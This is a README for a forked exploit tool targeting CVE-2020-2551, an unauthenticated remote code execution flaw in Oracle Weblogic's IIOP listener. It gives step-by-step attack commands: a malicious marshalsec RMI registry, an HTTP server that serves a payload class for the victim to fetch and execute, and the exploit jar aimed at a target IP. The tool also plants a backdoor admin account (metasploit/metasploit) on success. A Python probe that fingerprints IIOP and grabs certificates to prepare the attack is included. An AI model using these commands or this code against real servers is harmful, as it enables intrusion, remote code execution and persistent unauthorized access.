
Weblogic IIOP CVE-2020-2551

Primary Language: Java

CVE-2020-2551

Forked from https://github.com/Y4er/CVE-2020-2551 with some quality-of-life changes, listed below.

Description

A remote code execution vulnerability exists in the IIOP listener of Oracle Weblogic Server. A remote, unauthenticated attacker can send a crafted IIOP request that makes the server deserialize a Java object which performs a JNDI lookup against an attacker-controlled server; the malicious JNDI lookup results in code execution on the Weblogic host. The fix shipped in Oracle's January 2020 Critical Patch Update; where IIOP is not needed, disabling the protocol on the listen port also removes this attack surface, which is why the tool reports when IIOP is disabled.

Changes

  • The original tool from https://github.com/Y4er/CVE-2020-2551 only supports IIOP (7001/tcp); IIOPS (7002/tcp) was not implemented
  • Support for Weblogic listening on x.x.x.x:7002 (IIOPS) instead of just x.x.x.x:7001 (IIOP)
  • Support for Weblogic servers that accept TLS 1.2 only
  • Detect when the IIOP protocol has been disabled on the Weblogic server
  • Switch to SSL (IIOPS) automatically when TCP port 7002 is selected instead of 7001 (IIOP)
  • Add a local admin account (username/password metasploit|metasploit) on the Weblogic server on successful exploitation

Prerequisites

Steps

Clone and Compile

# Copy jdk-6u45-linux-x64.bin and jdk-8u281-linux-x64.tar.gz to /tmp
$ apt install ant
$ cd /tmp
$ wget 'https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true' -O marshalsec-0.0.3-SNAPSHOT-all.jar
$ tar xvfz jdk-8u281-linux-x64.tar.gz
$ chmod +x jdk-6u45-linux-x64.bin && ./jdk-6u45-linux-x64.bin
$ git clone http://peneuw2c-git01.fgxint.net:3000/klee/CVE-2020-2551
$ cd CVE-2020-2551
$ make

Dump and Import SSL Certificate

If you are targeting the Weblogic server on x.x.x.x:7002 (IIOPS), run the commands below so that the JVM running the exploit trusts the server's certificate. Replace 172.16.164.2 with the target's IP address; the certificate file name must be the same in both commands.
If you are targeting the Weblogic server on x.x.x.x:7001 (IIOP), skip this step.

$ echo -n | openssl s_client -connect 172.16.164.2:7002 2>/dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/172.16.164.2.crt
$ keytool -import -v -trustcacerts -alias 172.16.164.2 -file ~/172.16.164.2.crt -keystore /tmp/jdk1.8.0_281/jre/lib/security/cacerts -keypass changeit -storepass changeit

The keystore path is the cacerts of the JDK 8 unpacked into /tmp above, so run the exploit with that JDK's java (/tmp/jdk1.8.0_281/bin/java) rather than the system java; each JRE trusts only its own cacerts, and the imported certificate is otherwise ignored. Check the import with: keytool -list -keystore /tmp/jdk1.8.0_281/jre/lib/security/cacerts -storepass changeit -alias 172.16.164.2

Run each of the following commands in a separate terminal. The first starts a malicious RMI registry (marshalsec) that answers the JNDI lookup with a reference to the codebase http://172.16.164.1/#exp; the second serves the src directory over HTTP, where the exp class must be reachable as exp.class; the third sends the IIOP payload to the target. Replace 172.16.164.1 with your own IP address and 172.16.164.2 with the target's. For an IIOPS target use port 7002 instead of 7001 and run the jar with the JDK 8 java whose cacerts received the certificate.

$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.164.1/#exp" 1099
$ cd src && python3 -m http.server --bind 0.0.0.0 80
$ java -jar /tmp/CVE-2020-2551/build/jar/weblogic_CVE_2020_2551.jar 172.16.164.2 7001 rmi://172.16.164.1:1099/exp
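Before firing the exploit it is worth confirming that the listener actually speaks IIOP and, for 7002, grabbing the certificate the keytool step needs. The pre-flight probe below is an added example written for this page; it is not code from this fork or from Y4er's original tool. It builds a GIOP 1.0 LocateRequest (the wire format IIOP carries), switches to TLS when port 7002 is chosen (as the Changes list describes), classifies the answer, and can save the server certificate as PEM for keytool -import. The host and port values are placeholders, and the verdict is a heuristic: Weblogic multiplexes several protocols on one port, so a non-GIOP or empty answer is consistent with IIOP having been disabled but is not proof of it.

```python
import socket
import ssl
import struct

# GIOP 1.0 constants from the CORBA GIOP spec; IIOP is GIOP carried over TCP.
GIOP_MAGIC = b"GIOP"
MSG_TYPES = {0: "Request", 1: "Reply", 2: "CancelRequest", 3: "LocateRequest",
             4: "LocateReply", 5: "CloseConnection", 6: "MessageError", 7: "Fragment"}
LOCATE_REQUEST = 3
LOCATE_STATUS = {0: "UNKNOWN_OBJECT", 1: "OBJECT_HERE", 2: "OBJECT_FORWARD"}


def build_locate_request(request_id, object_key):
    """GIOP 1.0 LocateRequest: 12-byte header, then request_id and the
    object_key as a length-prefixed sequence<octet>. Big-endian, flags byte 0."""
    body = struct.pack(">II", request_id, len(object_key)) + object_key
    header = GIOP_MAGIC + bytes([1, 0, 0, LOCATE_REQUEST]) + struct.pack(">I", len(body))
    return header + body


def parse_giop_header(data):
    """Parse a GIOP header; raise ValueError if the bytes are not GIOP at all."""
    if len(data) < 12 or data[:4] != GIOP_MAGIC:
        raise ValueError("not a GIOP message")
    little_endian = bool(data[6] & 0x01)        # bit 0 of the flags byte = byte order
    (size,) = struct.unpack("<I" if little_endian else ">I", data[8:12])
    return {"version": (data[4], data[5]), "little_endian": little_endian,
            "type": MSG_TYPES.get(data[7], "unknown(%d)" % data[7]), "size": size}


def classify_reply(data):
    """Verdict on what the listener sent back (heuristic, see the lead-in)."""
    if not data:
        return "no GIOP reply: IIOP disabled or not accepted on this port"
    try:
        hdr = parse_giop_header(data)
    except ValueError:
        return "non-GIOP reply: IIOP disabled or another protocol answered"
    if hdr["type"] == "LocateReply" and len(data) >= 20:
        fmt = "<II" if hdr["little_endian"] else ">II"
        req_id, status = struct.unpack(fmt, data[12:20])
        return "IIOP enabled: LocateReply id=%d status=%s" % (req_id, LOCATE_STATUS.get(status, str(status)))
    return "IIOP enabled: GIOP %d.%d %s" % (hdr["version"][0], hdr["version"][1], hdr["type"])


def open_channel(host, port, timeout=5.0):
    """Plain TCP for IIOP, TLS for IIOPS; as in the fork, port 7002 drives the switch.
    Verification is off because this is only a probe; the exploit JVM trusts the cert via keytool."""
    raw = socket.create_connection((host, port), timeout=timeout)
    if port != 7002:
        return raw
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # floor at 1.2; a TLS 1.2-only server still negotiates
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx.wrap_socket(raw, server_hostname=host)


def dump_server_cert(host, port, path):
    """Save the listener's certificate as PEM, the same artifact the
    openssl s_client | sed step produces, ready for keytool -import."""
    pem = ssl.get_server_certificate((host, port))
    with open(path, "w") as fh:
        fh.write(pem)
    return pem


def probe_iiop(host, port):
    """Send one LocateRequest for an arbitrary object key and classify the answer."""
    msg = build_locate_request(1, b"NameService")   # the key only needs to be well-formed
    with open_channel(host, port) as sock:
        sock.sendall(msg)
        try:
            data = sock.recv(4096)
        except (socket.timeout, ConnectionError):
            data = b""
    return classify_reply(data)


if __name__ == "__main__":
    import sys
    target_host, target_port = sys.argv[1], int(sys.argv[2])   # placeholder usage: 172.16.164.2 7002
    if target_port == 7002:
        dump_server_cert(target_host, target_port, target_host + ".crt")
        print("certificate written to %s.crt; import it with keytool before running the exploit" % target_host)
    print(probe_iiop(target_host, target_port))
```

Run it as python3 probe.py 172.16.164.2 7002 (or 7001 for plain IIOP). A LocateReply, or any other message starting with the GIOP magic, means the port accepts IIOP and the exploit is worth attempting; the object key sent is arbitrary, so an UNKNOWN_OBJECT status is the expected healthy answer.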